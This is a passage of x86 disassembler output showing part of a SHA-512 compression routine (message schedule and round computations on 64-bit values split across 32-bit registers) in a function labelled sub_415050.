		mov	[esp+170h+var_4], esi
		mov	ecx, 10h
		lea	edi, [esp+170h+var_158]
		rep movsd
		mov	ecx, [eax+50h]
		mov	[esp+170h+var_100], ecx
		mov	ecx, [eax+58h]
		mov	[esp+170h+var_110], ecx
		mov	ecx, [eax+60h]
		mov	[esp+170h+var_108], ecx
		mov	ecx, [eax+68h]
		mov	[esp+170h+var_104], edx
		mov	edx, [eax+6Ch]
		mov	[esp+170h+var_B8], ecx
		mov	ecx, [eax+70h]
		mov	[esp+170h+var_B4], edx
		mov	edx, [eax+74h]
		mov	[esp+170h+var_A8], ecx
		mov	ecx, [eax+78h]
		mov	[esp+170h+var_A4], edx
		mov	edx, [eax+7Ch]
		mov	[esp+170h+var_D0], ecx
		mov	ecx, [eax+80h]
		mov	[esp+170h+var_CC], edx
		mov	edx, [eax+84h]
		mov	esi, [eax+0C4h]
		mov	[esp+170h+var_D8], ecx
		mov	ecx, [eax+88h]
		mov	[esp+170h+var_D4], edx
		mov	edx, [eax+8Ch]
		mov	[esp+170h+var_118], ecx
		mov	ecx, [eax+90h]
		mov	[esp+170h+var_114], edx
		mov	edx, [eax+94h]
		mov	[esp+170h+var_C8], ecx
		mov	ecx, [eax+98h]
		mov	[esp+170h+var_C4], edx
		mov	edx, [eax+9Ch]
		mov	[esp+170h+var_F0], ecx
		mov	ecx, [eax+0A0h]
		mov	[esp+170h+var_EC], edx
		mov	edx, [eax+0A4h]
		mov	[esp+170h+var_E8], ecx
		mov	ecx, [eax+0A8h]
		mov	[esp+170h+var_E4], edx
		mov	edx, [eax+0ACh]
		mov	[esp+170h+var_F8], ecx
		mov	ecx, [eax+0B0h]
		mov	[esp+170h+var_F4], edx
		mov	edx, [eax+0B4h]
		mov	[esp+170h+var_B0], ecx
		mov	ecx, [eax+0B8h]
		mov	[esp+170h+var_AC], edx
		mov	edx, [eax+0BCh]
		mov	[esp+170h+var_C0], ecx
		mov	ecx, [eax+0C0h]
		mov	[esp+170h+var_BC], edx
		mov	edx, [eax+0C8h]
		mov	eax, [eax+0CCh]
		xor	edi, edi
		mov	[esp+170h+var_15C], edi
		mov	[esp+170h+var_A0], ecx
		mov	[esp+170h+var_9C], esi
		mov	[esp+170h+var_E0], edx
		mov	[esp+170h+var_DC], eax
		jmp	short loc_4151EE
; ---------------------------------------------------------------------------
		align 10h

loc_4151E0:				; CODE XREF: sub_415050+2680j
		mov	ecx, [esp+170h+var_A0]
		mov	esi, [esp+170h+var_9C]

loc_4151EE:				; CODE XREF: sub_415050+18Aj
		test	edi, edi
		mov	eax, [esp+170h+var_138]
		mov	edx, [esp+170h+var_134]
		jz	loc_4152D8
		mov	edi, ecx
		xor	eax, eax
		mov	ebx, esi
		shrd	edi, ebx, 13h
		or	eax, edi
		mov	ebp, ecx
		mov	edx, ecx
		mov	edi, esi
		shld	esi, ebp, 3
		shr	ebx, 13h
		shl	edx, 0Dh
		or	edx, ebx
		add	ebp, ebp
		xor	ebx, ebx
		or	ebx, esi
		mov	esi, [esp+170h+var_9C]
		shrd	ecx, esi, 6
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	eax, edi
		xor	eax, ecx
		mov	ecx, [esp+170h+var_10C]
		xor	edx, ebx
		mov	[esp+170h+var_160], eax
		mov	eax, [esp+170h+var_110]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		shr	esi, 6
		xor	edx, esi
		xor	edi, edi
		or	edi, ebx
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_10C]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_110]
		shrd	ecx, eax, 7
		shr	eax, 7
		xor	edi, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+arg_0]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_160]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_100]
		adc	edx, [esp+170h+var_FC]
		add	ecx, [esp+170h+var_F0]
		adc	edx, [esp+170h+var_EC]
		mov	[eax+50h], ecx
		mov	[eax+54h], edx
		mov	eax, edx
		mov	edx, [esp+170h+var_134]
		mov	[esp+170h+var_FC], eax
		mov	[esp+170h+var_54], eax
		mov	eax, [esp+170h+var_138]
		mov	[esp+170h+var_100], ecx
		mov	[esp+170h+var_58], ecx
		jmp	short loc_4152EE
; ---------------------------------------------------------------------------

loc_4152D8:				; CODE XREF: sub_415050+1A8j
		mov	ecx, [esp+170h+var_100]
		mov	[esp+170h+var_58], ecx
		mov	ecx, [esp+170h+var_FC]
		mov	[esp+170h+var_54], ecx

loc_4152EE:				; CODE XREF: sub_415050+286j
		mov	ebx, edx
		mov	esi, edx
		xor	edi, edi
		mov	ecx, eax
		shld	ebx, ecx, 17h
		or	edi, ebx
		shl	ecx, 17h
		xor	ebx, ebx
		shr	esi, 9
		or	esi, ecx
		mov	ebp, eax
		shrd	ebp, edx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_134]
		xor	esi, ebx
		shr	edx, 12h
		mov	ecx, eax
		shl	ecx, 0Eh
		or	ecx, edx
		xor	edi, ecx
		xor	ecx, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	ecx, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_134]
		shr	ebp, 0Eh
		mov	edx, eax
		shl	edx, 12h
		or	edx, ebp
		mov	ebp, [esp+170h+var_130]
		xor	edi, edx
		and	ebp, eax
		mov	edx, eax
		mov	eax, [esp+170h+var_12C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_11C]
		not	edx
		and	edx, [esp+170h+var_128]
		not	ebx
		and	ebx, [esp+170h+var_124]
		xor	edx, ebp
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		add	esi, edx
		adc	edi, ebx
		add	esi, ds:dword_420AF8[eax*8]
		adc	edi, ds:dword_420AFC[eax*8]
		add	esi, [esp+170h+var_58]
		mov	eax, [esp+170h+var_120]
		adc	edi, [esp+170h+var_54]
		add	eax, esi
		adc	ecx, edi
		add	[esp+170h+var_140], eax
		mov	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_120], eax
		adc	[esp+170h+var_13C], ecx
		mov	eax, [esp+170h+var_154]
		mov	ecx, [esp+170h+var_158]
		mov	edx, ecx
		mov	esi, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		mov	ecx, eax
		xor	edi, edx
		xor	esi, ebx
		shr	ecx, 7
		mov	ebx, [esp+170h+var_158]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		shl	ebx, 19h
		or	ecx, ebx
		xor	edx, edx
		or	edx, ebp
		mov	ebp, [esp+170h+var_14C]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_150]
		xor	esi, edx
		mov	edx, [esp+170h+var_158]
		mov	ebx, ecx
		xor	ebx, edx
		and	ebx, [esp+170h+var_148]
		and	ecx, edx
		mov	edx, [esp+170h+var_14C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_144]
		and	edx, eax
		xor	ebx, ecx
		xor	ebp, edx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_120], edi
		adc	[esp+170h+var_11C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_415504
		mov	eax, [esp+170h+var_E0]
		mov	ecx, [esp+170h+var_DC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_DC]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_108]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_104]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_108]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_104]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_E8]
		adc	edx, [esp+170h+var_E4]
		add	ecx, [esp+170h+var_110]
		adc	edx, [esp+170h+var_10C]
		mov	[eax+58h], ecx
		mov	[eax+5Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_110], ecx
		mov	[esp+170h+var_10C], eax
		mov	[esp+170h+var_28], ecx
		jmp	short loc_415513
; ---------------------------------------------------------------------------

loc_415504:				; CODE XREF: sub_415050+3D5j
		mov	edx, [esp+170h+var_110]
		mov	eax, [esp+170h+var_10C]
		mov	[esp+170h+var_28], edx

loc_415513:				; CODE XREF: sub_415050+4B2j
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	[esp+170h+var_24], eax
		mov	eax, [esp+170h+var_140]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_134]
		mov	edi, eax
		and	eax, [esp+170h+var_138]
		not	ebx
		and	ebx, [esp+170h+var_12C]
		not	edi
		and	edi, [esp+170h+var_130]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B00[eax*8]
		adc	esi, ds:dword_420B04[eax*8]
		add	edx, [esp+170h+var_28]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_24]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_148], eax
		mov	[esp+170h+var_124], ecx
		mov	[esp+170h+var_128], eax
		adc	[esp+170h+var_144], ecx
		mov	eax, [esp+170h+var_11C]
		mov	ecx, [esp+170h+var_120]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_120]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_154]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_158]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_120]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_150]
		and	edx, ecx
		mov	ecx, [esp+170h+var_154]
		xor	ebp, eax
		and	ebp, [esp+170h+var_14C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_128], edi
		adc	[esp+170h+var_124], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41572E
		mov	eax, [esp+170h+var_B8]
		mov	ecx, [esp+170h+var_B4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_B4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_100]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_FC]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_100]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_FC]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_F8]
		adc	edx, [esp+170h+var_F4]
		add	ecx, [esp+170h+var_108]
		adc	edx, [esp+170h+var_104]
		mov	[eax+60h], ecx
		mov	[eax+64h], edx
		mov	eax, edx
		mov	[esp+170h+var_108], ecx
		mov	[esp+170h+var_104], eax
		mov	[esp+170h+var_70], ecx
		jmp	short loc_41573D
; ---------------------------------------------------------------------------

loc_41572E:				; CODE XREF: sub_415050+605j
		mov	edx, [esp+170h+var_108]
		mov	eax, [esp+170h+var_104]
		mov	[esp+170h+var_70], edx

loc_41573D:				; CODE XREF: sub_415050+6DCj
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		mov	[esp+170h+var_6C], eax
		mov	eax, [esp+170h+var_148]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_144]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_13C]
		mov	edi, eax
		and	eax, [esp+170h+var_140]
		not	ebx
		and	ebx, [esp+170h+var_134]
		not	edi
		and	edi, [esp+170h+var_138]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_12C]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B08[eax*8]
		adc	esi, ds:dword_420B0C[eax*8]
		add	edx, [esp+170h+var_70]
		mov	eax, [esp+170h+var_130]
		adc	esi, [esp+170h+var_6C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_150], eax
		mov	[esp+170h+var_12C], ecx
		mov	[esp+170h+var_130], eax
		adc	[esp+170h+var_14C], ecx
		mov	eax, [esp+170h+var_124]
		mov	ecx, [esp+170h+var_128]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_128]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_11C]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_120]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_128]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_158]
		and	edx, ecx
		mov	ecx, [esp+170h+var_11C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_154]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_130], edi
		adc	[esp+170h+var_12C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41596A
		mov	eax, [esp+170h+var_A8]
		mov	ecx, [esp+170h+var_A4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_A4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_110]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_10C]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_110]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_10C]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_B0]
		adc	edx, [esp+170h+var_AC]
		add	ecx, [esp+170h+var_B8]
		adc	edx, [esp+170h+var_B4]
		mov	[eax+68h], ecx
		mov	[eax+6Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_B8], ecx
		mov	[esp+170h+var_B4], eax
		mov	[esp+170h+var_38], ecx
		jmp	short loc_41597F
; ---------------------------------------------------------------------------

loc_41596A:				; CODE XREF: sub_415050+82Fj
		mov	edx, [esp+170h+var_B8]
		mov	eax, [esp+170h+var_B4]
		mov	[esp+170h+var_38], edx

loc_41597F:				; CODE XREF: sub_415050+918j
		mov	ecx, [esp+170h+var_14C]
		mov	ebx, ecx
		mov	[esp+170h+var_34], eax
		mov	eax, [esp+170h+var_150]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_14C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_148]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_14C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_144]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_134]
		not	ebx
		and	ebx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_140]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B10[eax*8]
		adc	esi, ds:dword_420B14[eax*8]
		add	edx, [esp+170h+var_38]
		mov	eax, [esp+170h+var_138]
		adc	esi, [esp+170h+var_34]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_158], eax
		mov	[esp+170h+var_134], ecx
		mov	[esp+170h+var_138], eax
		adc	[esp+170h+var_154], ecx
		mov	ecx, [esp+170h+var_130]
		mov	eax, [esp+170h+var_12C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_130]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_124]
		shl	ebx, 19h
		xor	esi, edx
		mov	edx, [esp+170h+var_128]
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_130]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_120]
		and	edx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	ebp, eax
		and	ebp, [esp+170h+var_11C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_138], edi
		adc	[esp+170h+var_134], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_415BB0
		mov	eax, [esp+170h+var_D0]
		mov	ecx, [esp+170h+var_CC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_CC]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_108]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_104]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_108]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_104]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_C0]
		adc	edx, [esp+170h+var_BC]
		add	ecx, [esp+170h+var_A8]
		adc	edx, [esp+170h+var_A4]
		mov	[eax+70h], ecx
		mov	[eax+74h], edx
		mov	eax, edx
		mov	[esp+170h+var_A8], ecx
		mov	[esp+170h+var_A4], eax
		mov	[esp+170h+var_88], ecx
		jmp	short loc_415BC5
; ---------------------------------------------------------------------------

loc_415BB0:				; CODE XREF: sub_415050+A75j
		mov	edx, [esp+170h+var_A8]
		mov	eax, [esp+170h+var_A4]
		mov	[esp+170h+var_88], edx

loc_415BC5:				; CODE XREF: sub_415050+B5Ej
		mov	ecx, [esp+170h+var_154]
		mov	[esp+170h+var_84], eax
		mov	eax, [esp+170h+var_158]
		mov	ebx, ecx
		xor	esi, esi
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		mov	edx, ecx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		xor	ebx, ebx
		or	ebx, ebp
		mov	ebp, [esp+170h+var_154]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		shr	ebp, 0Eh
		or	ecx, ebp
		mov	ebp, [esp+170h+var_150]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_154]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_14C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_144]
		xor	edi, ebp
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B18[eax*8]
		mov	edi, [esp+170h+var_12C]
		adc	esi, ds:dword_420B1C[eax*8]
		add	edx, [esp+170h+var_88]
		mov	eax, [esp+170h+var_140]
		adc	esi, [esp+170h+var_84]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_120], eax
		mov	esi, [esp+170h+var_130]
		mov	[esp+170h+var_140], eax
		adc	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_13C], ecx
		mov	ecx, [esp+170h+var_138]
		mov	eax, esi
		xor	eax, ecx
		mov	[esp+170h+var_98], eax
		mov	eax, [esp+170h+var_134]
		mov	edx, edi
		xor	edx, eax
		mov	[esp+170h+var_94], edx
		mov	edx, esi
		and	edx, ecx
		mov	[esp+170h+var_90], edx
		mov	edx, edi
		and	edx, eax
		mov	[esp+170h+var_8C], edx
		mov	edx, ecx
		xor	esi, esi
		shl	edx, 4
		mov	edi, ecx
		mov	ebx, eax
		shrd	edi, ebx, 1Ch
		shr	ebx, 1Ch
		or	edx, ebx
		or	esi, edi
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	ebx, ebx
		shl	ecx, 1Eh
		or	ebx, ebp
		mov	edi, eax
		xor	edx, ebx
		mov	ebx, [esp+170h+var_138]
		shr	edi, 2
		or	edi, ecx
		mov	ecx, eax
		shld	eax, ebx, 19h
		xor	esi, edi
		shr	ecx, 7
		xor	edi, edi
		or	edi, eax
		mov	eax, [esp+170h+var_98]
		and	eax, [esp+170h+var_128]
		shl	ebx, 19h
		xor	eax, [esp+170h+var_90]
		or	ecx, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_94]
		and	ecx, [esp+170h+var_124]
		xor	edx, edi
		xor	ecx, [esp+170h+var_8C]
		add	esi, eax
		adc	edx, ecx
		add	[esp+170h+var_140], esi
		adc	[esp+170h+var_13C], edx
		cmp	[esp+170h+var_15C], 0
		jz	loc_415E32
		mov	eax, [esp+170h+var_B8]
		mov	ecx, [esp+170h+var_B4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_B4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_D8]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_D4]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_D8]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_D4]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
